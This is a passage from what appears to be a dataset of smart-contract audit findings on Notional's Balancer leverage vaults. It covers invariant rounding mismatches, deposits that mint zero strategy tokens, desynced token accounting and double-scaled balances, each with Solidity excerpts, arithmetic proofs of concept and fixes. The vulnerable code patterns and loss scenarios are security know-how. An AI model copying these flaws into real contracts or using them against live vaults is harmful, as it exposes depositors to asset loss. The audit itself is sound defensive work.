parameter.\\n```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n\\nWithin the `Boosted3TokenPoolUtils._getSpotPrice` and `Boosted3TokenPoolUtils._getValidatedPoolData` functions, the `StableMath._calculateInvariant` is computed rounding up.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _getSpotPrice(\\n ThreeTokenPoolContext memory poolContext, \\n BoostedOracleContext memory oracleContext,\\n uint8 tokenIndex\\n ) internal pure returns (uint256 spotPrice) {\\n..SNIP..\\n uint256[] memory balances = _getScaledBalances(poolContext);\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, balances, true // roundUp = true\\n );\\n```\\n\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _getValidatedPoolData(\\n ThreeTokenPoolContext memory poolContext,\\n BoostedOracleContext memory oracleContext,\\n StrategyContext memory strategyContext\\n ) internal view returns (uint256 virtualSupply, uint256[] memory balances, uint256 invariant) {\\n (virtualSupply, balances) =\\n _getVirtualSupplyAndBalances(poolContext, oracleContext);\\n\\n // Get the current and new invariants. Since we need a bigger new invariant, we round the current one up.\\n invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, balances, true // roundUp = true\\n );\\n```\\n\\nHowever, Balancer has since migrated its Boosted3Token pool from the legacy BoostedPool structure to a new ComposableBoostedPool contract.\\nThe new ComposableBoostedPool contract uses a newer version of the StableMath library where the `StableMath._calculateInvariant` function always rounds down.\\n```\\n function _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n // Always round down, to match Vyper's arithmetic (which always truncates).\\n\\n uint256 sum = 0; // S in the Curve version\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n ..SNIP..\\n```\\n\\nThus, Notional round up when calculating the invariant while Balancer's ComposableBoostedPool round down when calculating the invariant. This inconsistency will result in a different invariant","To avoid any discrepancy in the result, ensure that the StableMath library used by Balancer's ComposableBoostedPool and Notional's Boosted3Token leverage vault are aligned, and the implementation of the StableMath functions is the same between them.","The invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. settle vault, reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated and the trade proceeds to execute against the manipulated pool leading to a loss of assets.","```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n" +Users deposit assets to the vault but receives no strategy token in return,high,"Due to a rounding error in Solidity, it is possible that a user deposits assets to the vault, but receives no strategy token in return due to issues in the following functions:\\nStrategyUtils._convertBPTClaimToStrategyTokens\\nBoosted3TokenPoolUtils._deposit\\nTwoTokenPoolUtils._deposit\\nThis affects both the TwoToken and Boosted3Token vaults\\n```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n\\nWithin the `StrategyUtils._convertBPTClaimToStrategyTokens` function, it was observed that the numerator precision (1e8) is much smaller than the denominator precision (1e18).\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts BPT to strategy tokens\\n function _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.vaultState.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\n }\\n```\\n\\nAs a result, the `StrategyUtils._convertBPTClaimToStrategyTokens` function might return zero strategy tokens under the following two conditions:\\nIf the `totalBPTHeld` is zero (First Deposit)\\nIf the `totalBPTHeld` is zero, the code at Line 31 will be executed, and the following formula is used:\\n```\\nstrategyTokenAmount = (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / BalancerConstants.BALANCER_PRECISION;\\nstrategyTokenAmount = (bptClaim * 1e8) / 1e18\\nstrategyTokenAmount = ((10 ** 10 - 1) * 1e8) / 1e18 = 0\\n```\\n\\nDuring the first deposit, if the user deposits less than 1e10 BPT, Solidity will round down and `strategyTokenAmount` will be zero.\\nIf the `totalBPTHeld` is larger than zero (Subsequently Deposits)\\nIf the `totalBPTHeld` is larger than zero, the code at Line 38 will be executed, and the following formula is used:\\n```\\nstrategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\nstrategyTokenAmount = (bptClaim * (x * 1e8))/ (y * 1e18)\\n```\\n\\nIf the numerator is less than the denominator, the `strategyTokenAmount` will be zero.\\nTherefore, it is possible that the users deposited their minted BPT to the vault, but received zero strategy tokens in return.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _deposit(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n BoostedOracleContext memory oracleContext,\\n uint256 deposit,\\n uint256 minBPT\\n ) internal returns (uint256 strategyTokensMinted) {\\n uint256 bptMinted = poolContext._joinPoolAndStake({\\n strategyContext: strategyContext,\\n stakingContext: stakingContext,\\n oracleContext: oracleContext,\\n deposit: deposit,\\n minBPT: minBPT\\n });\\n\\n strategyTokensMinted = strategyContext._convertBPTClaimToStrategyTokens(bptMinted);\\n\\n strategyContext.vaultState.totalBPTHeld += bptMinted;\\n // Update global supply count\\n strategyContext.vaultState.totalStrategyTokenGlobal += strategyTokensMinted.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nProof-of-Concept\\nAssume that Alice is the first depositor, and she forwarded 10000 BPT. During the first mint, the strategy token will be minted in a 1:1 ratio. Therefore, Alice will receive 10000 strategy tokens in return. At this point in time, `totalStrategyTokenGlobal` = 10000 strategy tokens and `totalBPTHeld` is 10000 BPT.\\nWhen Bob deposits to the vault after Alice, he will be subjected to the following formula:\\n```\\nstrategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\nstrategyTokenAmount = (bptClaim * (10000 * 1e8))/ (10000 * 1e18)\\nstrategyTokenAmount = (bptClaim * (1e12))/ (1e22)\\n```\\n\\nIf Bob deposits less than 1e10 BPT, Solidity will round down and `strategyTokenAmount` will be zero. Bob will receive no strategy token in return for his BPT.\\nAnother side effect of this issue is that if Alice withdraws all her strategy tokens, she will get back all her 10000 BPT plus the BPT that Bob deposited earlier.","Consider reverting if zero strategy token is minted. This check has been implemented in many well-known vault designs as this is a commonly known issue (e.g. Solmate)\\n```\\nfunction _deposit(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n BoostedOracleContext memory oracleContext,\\n uint256 deposit,\\n uint256 minBPT\\n) internal returns (uint256 strategyTokensMinted) {\\n uint256 bptMinted = poolContext._joinPoolAndStake({\\n strategyContext: strategyContext,\\n stakingContext: stakingContext,\\n oracleContext: oracleContext,\\n deposit: deposit,\\n minBPT: minBPT\\n });\\n\\n strategyTokensMinted = strategyContext._convertBPTClaimToStrategyTokens(bptMinted);\\n// Add the line below\\n require(strategyTokensMinted != 0, ""zero strategy token minted""); \\n\\n strategyContext.vaultState.totalBPTHeld // Add the line below\\n= bptMinted;\\n // Update global supply count\\n strategyContext.vaultState.totalStrategyTokenGlobal // Add the line below\\n= strategyTokensMinted.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n",Loss of assets for the users as they deposited their assets but receive zero strategy tokens in return.,```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n +Vault's `totalStrategyTokenGlobal` will not be in sync,high,"The `strategyContext.vaultState.totalStrategyTokenGlobal` variable that tracks the number of strategy tokens held in the vault will not be in sync and will cause accounting issues within the vault.\\nThis affects both the TwoToken and Boosted3Token vaults\\nThe `StrategyUtils._convertStrategyTokensToBPTClaim` function might return zero if a small number of `strategyTokenAmount` is passed into the function. If `(strategyTokenAmount * context.vaultState.totalBPTHeld)` is smaller than `context.vaultState.totalStrategyTokenGlobal`, the `bptClaim` will be zero.\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts strategy tokens to BPT\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n\\nIn Line 441 of the `Boosted3TokenPoolUtils._redeem` function below, if `bptClaim` is zero, it will return zero and exit the function immediately.\\nIf a small number of `strategyTokens` is passed into the `_redeem` function and the `bptClaim` ends up as zero, the caller of the `_redeem` function will assume that all the `strategyTokens` have been redeemed.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nThe following function shows an example of the caller of the `_redeem` function at Line 171 below accepting the zero value as it does not revert when the zero value is returned by the `_redeem` function. Thus, it will consider the small number of `strategyTokens` to be redeemed. Note that the `_redeemFromNotional` function calls the `_redeem` function under the hood.\\n```\\nFile: BaseStrategyVault.sol\\n function redeemFromNotional(\\n address account,\\n address receiver,\\n uint256 strategyTokens,\\n uint256 maturity,\\n uint256 underlyingToRepayDebt,\\n bytes calldata data\\n ) external onlyNotional returns (uint256 transferToReceiver) {\\n uint256 borrowedCurrencyAmount = _redeemFromNotional(account, strategyTokens, maturity, data);\\n\\n uint256 transferToNotional;\\n if (account == address(this) || borrowedCurrencyAmount <= underlyingToRepayDebt) {\\n // It may be the case that insufficient tokens were redeemed to repay the debt. If this\\n // happens the Notional will attempt to recover the shortfall from the account directly.\\n // This can happen if an account wants to reduce their leverage by paying off debt but\\n // does not want to sell strategy tokens to do so.\\n // The other situation would be that the vault is calling redemption to deleverage or\\n // settle. In that case all tokens go back to Notional.\\n transferToNotional = borrowedCurrencyAmount;\\n } else {\\n transferToNotional = underlyingToRepayDebt;\\n unchecked { transferToReceiver = borrowedCurrencyAmount - underlyingToRepayDebt; }\\n }\\n\\n if (_UNDERLYING_IS_ETH) {\\n if (transferToReceiver > 0) payable(receiver).transfer(transferToReceiver);\\n if (transferToNotional > 0) payable(address(NOTIONAL)).transfer(transferToNotional);\\n } else {\\n if (transferToReceiver > 0) _UNDERLYING_TOKEN.checkTransfer(receiver, transferToReceiver);\\n if (transferToNotional > 0) _UNDERLYING_TOKEN.checkTransfer(address(NOTIONAL), transferToNotional);\\n }\\n }\\n```\\n\\nSubsequently, on Notional side, it will deduct the redeemed strategy tokens from itsvaultState.totalStrategyTokens state (Refer to Line 177 below)\\n```\\nFile: VaultAction.sol\\n /// @notice Redeems strategy tokens to cash\\n function _redeemStrategyTokensToCashInternal(\\n VaultConfig memory vaultConfig,\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata vaultData\\n ) private nonReentrant returns (int256 assetCashRequiredToSettle, int256 underlyingCashRequiredToSettle) {\\n // If the vault allows further re-entrancy then set the status back to the default\\n if (vaultConfig.getFlag(VaultConfiguration.ALLOW_REENTRANCY)) {\\n reentrancyStatus = _NOT_ENTERED;\\n }\\n\\n VaultState memory vaultState = VaultStateLib.getVaultState(vaultConfig.vault, maturity);\\n (int256 assetCashReceived, uint256 underlyingToReceiver) = vaultConfig.redeemWithoutDebtRepayment(\\n vaultConfig.vault, strategyTokensToRedeem, maturity, vaultData\\n );\\n require(assetCashReceived > 0);\\n // Safety check to ensure that the vault does not somehow receive tokens in this scenario\\n require(underlyingToReceiver == 0);\\n\\n vaultState.totalAssetCash = vaultState.totalAssetCash.add(uint256(assetCashReceived));\\n vaultState.totalStrategyTokens = vaultState.totalStrategyTokens.sub(strategyTokensToRedeem);\\n vaultState.setVaultState(vaultConfig.vault);\\n\\n emit VaultRedeemStrategyToken(vaultConfig.vault, maturity, assetCashReceived, strategyTokensToRedeem);\\n return _getCashRequiredToSettle(vaultConfig, vaultState, maturity);\\n }\\n```\\n\\nHowever, the main issue is that when a small number of `strategyTokens` are redeemed and `bptClaim` is zero, the `_redeem` function will exit at Line 441 immediately. Thus, the redeemed strategy tokens are not deducted from the `strategyContext.vaultState.totalStrategyTokenGlobal` accounting variable on the Vault side.\\nThus, `strategyContext.vaultState.totalStrategyTokenGlobal` on the Vault side will not be in sync with the `vaultState.totalStrategyTokens` on the Notional side.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n","The number of strategy tokens redeemed needs to be deducted from the vault's `totalStrategyTokenGlobal` regardless of the `bptClaim` value. Otherwise, the vault's `totalStrategyTokenGlobal` will not be in sync.\\nWhen `bptClaim` is zero, it does not always mean that no strategy token has been redeemed. Based on the current vault implementation, the `bptClaim` might be zero because the number of strategy tokens to be redeemed is too small and thus it causes Solidity to round down to zero.\\n```\\nfunction _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n// Add the line below\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n// Add the line below\\n strategyContext.vaultState.setStrategyVaultState();\\n// Add the line below\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld // Remove the line below\\n= bptClaim;\\n// Remove the line below\\n strategyContext.vaultState.totalStrategyTokenGlobal // Remove the line below\\n= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n","The `strategyContext.vaultState.totalStrategyTokenGlobal` variable that tracks the number of strategy tokens held in the vault will not be in sync and will cause accounting issues within the vault. This means that the actual total strategy tokens in circulation and the `strategyContext.vaultState.totalStrategyTokenGlobal` will be different. The longer the issue is left unfixed, the larger the differences between them.\\nThe `strategyContext.vaultState.totalStrategyTokenGlobal` will be larger than expected because it does not deduct the number of strategy tokens when it should be under certain conditions.\\nOne example of the impact is as follows: The affected variable is used within the `_convertStrategyTokensToBPTClaim` and `_convertBPTClaimToStrategyTokens`, `_getBPTHeldInMaturity` functions. These functions are used within the deposit and redeem functions of the vault. Therefore, the number of strategy tokens or assets the users receive will not be accurate and might be less or more than expected.","```\\nFile: StrategyUtils.sol\\n /// @notice Converts strategy tokens to BPT\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n" +Token amounts are scaled up twice causing the amounts to be inflated in two token vault,high,"Token amounts are scaled up twice causing the amounts to be inflated in two token vault when performing computation. This in turn causes the reinvest function to break leading to a loss of assets for vault users, and the value of their strategy tokens will be struck and will not appreciate.\\nIn Line 121-124, the `primaryAmount` and `secondaryAmount` are scaled up to `BALANCER_PRECISION` (1e18). The reason for doing so is that balancer math functions expect all amounts to be in `BALANCER_PRECISION` (1e18).\\nThen, the scaled `primaryAmount` and `secondaryAmount` are passed into the `_getSpotPrice` function at Line 126.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n```\\n\\nWithin the `_getSpotPrice` function, the `primaryBalance` and `secondaryBalance` are scaled up again at Line 25 - 28. As such, any token (e.g. USDC) with a decimal of less than `BALANCER_PRECISION` (1e18) will be scaled up twice. This will cause the `balanceX` or `balanceY` to be inflated.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX,\\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n\\nBalancer's Scaling Factors\\nIt is important to know the underlying mechanism of scaling factors within Balancer to understand this issue.\\nWithin Balancer, all stable math calculations within the Balancer's pools are performed in 1e18. Thus, before passing the token balances to the stable math functions, all the balances need to be normalized to 18 decimals.\\nFor instance, assume that 100 USDC needs to be passed into the stable math functions for some computation. 100 USDC is equal to `100e6` since the decimals of USDC is `6`. To normalize it to 18 decimals, 100 USDC (100e6) will be multiplied by its scaling factor (1e12), and the result will be `100e18`.\\nThe following code taken from Balancer shows that the scaling factor is comprised of the scaling factor multiplied by the token rate. The scaling factor is the value needed to normalize the token balance to 18 decimals.\\n```\\n /**\\n * @dev Overrides scaling factor getter to introduce the tokens' price rate.\\n * Note that it may update the price rate cache if necessary.\\n */\\n function _scalingFactors() internal view virtual override returns (uint256[] memory scalingFactors) {\\n // There is no need to check the arrays length since both are based on `_getTotalTokens`\\n // Given there is no generic direction for this rounding, it simply follows the same strategy as the BasePool.\\n scalingFactors = super._scalingFactors();\\n scalingFactors[0] = scalingFactors[0].mulDown(_priceRate(_token0));\\n scalingFactors[1] = scalingFactors[1].mulDown(_priceRate(_token1));\\n }\\n```\\n\\nAnother point to note is that Balancer's stable math functions perform calculations in fixed point format. Therefore, the scaling factor will consist of the `FixedPoint.ONE` (1e18) multiplied by the value needed to normalize the token balance to 18 decimals. If it is a USDC with 6 decimals, the scaling factor will be 1e30:\\n```\\nFixedPoint.ONE * 10**decimalsDifference\\n1e18 * 1e12 = 1e30\\n```\\n\\n```\\n /**\\n * @dev Returns a scaling factor that, when multiplied to a token amount for `token`, normalizes its balance as if\\n * it had 18 decimals.\\n */\\n function _computeScalingFactor(IERC20 token) internal view returns (uint256) {\\n // Tokens that don't implement the `decimals` method are not supported.\\n uint256 tokenDecimals = ERC20(address(token)).decimals();\\n\\n // Tokens with more than 18 decimals are not supported.\\n uint256 decimalsDifference = Math.sub(18, tokenDecimals);\\n return FixedPoint.ONE * 10**decimalsDifference;\\n }\\n```\\n\\nProof-of-Concept\\nAssume that one of the tokens in Notional's two token leverage vault has a decimal of less than 18. Let's take USDC as an example.\\n100 USDC (1e6) is passed into the `_validateSpotPriceAndPairPrice` function as the `primaryAmount`. In Line 121-124 of the `_validateSpotPriceAndPairPrice` function, the `primaryAmount` will be scaled up to `BALANCER_PRECISION` (1e18).\\n`primaryAmount` = `primaryAmount` * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n`primaryAmount` = 100e6 * 1e18 / 1e6\\n`primaryAmount` = 100e18\\nWithin the `_getSpotPrice` function, the `primaryBalance` is scaled up again at Line 25 - 28 of the `_getSpotPrice` function.\\n`scaledPrimaryBalance = `primaryBalance` * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\nscaledPrimaryBalance = 100e18 * 1e30 / 1e18\\nscaledPrimaryBalance = 1e30\\nscaledPrimaryBalance = 1000000000000e18`\\nAs shown above, normalized 100 USDC (100e18) ended up becoming normalized 1000000000000 USDC (1000000000000e18). Therefore, the stable math functions are computed with an inflated balance of 1000000000000 USDC instead of 100 USDC.","Since the token balances are already normalized to 18 decimals within the `_getSpotPrice` function, the code to normalize the token balances in the `_validateSpotPriceAndPairPrice` function can be removed.\\n```\\n function _validateSpotPriceAndPairPrice(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 primaryAmount, \\n uint256 secondaryAmount\\n ) internal view {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check spotPrice against oracle price to make sure that \\n /// the pool is not being manipulated\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n\\n// Remove the line below\\n /// @notice Balancer math functions expect all amounts to be in BALANCER_PRECISION\\n// Remove the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Remove the line below\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n// Remove the line below\\n primaryAmount = primaryAmount * BalancerConstants.BALANCER_PRECISION / primaryPrecision;\\n// Remove the line below\\n secondaryAmount = secondaryAmount * BalancerConstants.BALANCER_PRECISION / secondaryPrecision;\\n\\n uint256 calculatedPairPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: primaryAmount,\\n secondaryBalance: secondaryAmount,\\n tokenIndex: 0\\n });\\n\\n /// @notice Check the calculated primary/secondary price against the oracle price\\n /// to make sure that we are joining the pool proportionally\\n _checkPriceLimit(strategyContext, oraclePrice, calculatedPairPrice);\\n }\\n```\\n","The spot price computed by the `Stable2TokenOracleMath._getSpotPrice` function will deviate from the actual price because inflated balances were passed into it. The deviated spot price will then be passed to the `_checkPriceLimit` function to verify if the spot price has deviated from the oracle price. The check will fail and cause a revert. This will in turn cause the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function to revert.\\nTherefore, any function that relies on the `Stable2TokenOracleMath._validateSpotPriceAndPairPrice` function will be affected. It was found that the `MetaStable2TokenAuraHelper.reinvestReward` relies on the 